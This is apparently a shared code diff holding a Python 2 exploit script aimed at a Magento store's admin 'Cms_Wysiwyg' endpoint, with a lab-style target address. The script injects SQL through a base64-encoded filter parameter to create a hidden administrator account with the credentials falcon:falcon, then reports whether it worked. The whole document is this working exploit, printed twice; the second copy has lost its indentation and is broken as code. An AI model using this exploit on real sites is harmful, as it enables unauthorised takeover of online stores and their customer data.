falcononrails · June 7, 2020 15:05
diff --git a/rce_magento.py b/rce_magento.py
 import requests
 import base64
 import sys

 target = "http://10.10.10.140/index.php"

 if not target.startswith("http"):
    target = "http://" + target

 if target.endswith("/"):
    target = target[:-1]

 target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

 q="""
 SET @SALT = 'rp';
 SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
 SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
 INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
 INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
 """


 query = q.replace("\n", "").format(username="falcon", password="falcon")
 pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

 # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is
 r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
 if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds falcon:falcon".format(target)
 else:
    print "DID NOT WORK"
	import requests
	import base64
	import sys

	target = "http://10.10.10.140/index.php"

	if not target.startswith("http"):
	target = "http://" + target

	if target.endswith("/"):
	target = target[:-1]

	target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

	q="""
	SET @SALT = 'rp';
	SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
	SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
	INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
	INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
	"""


	query = q.replace("\n", "").format(username="falcon", password="falcon")
	pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

	# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is
	r = requests.post(target_url,
	data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
	"filter": base64.b64encode(pfilter),
	"forwarded": 1})
	if r.ok:
	print "WORKED"
	print "Check {0}/admin with creds falcon:falcon".format(target)
	else:
	print "DID NOT WORK"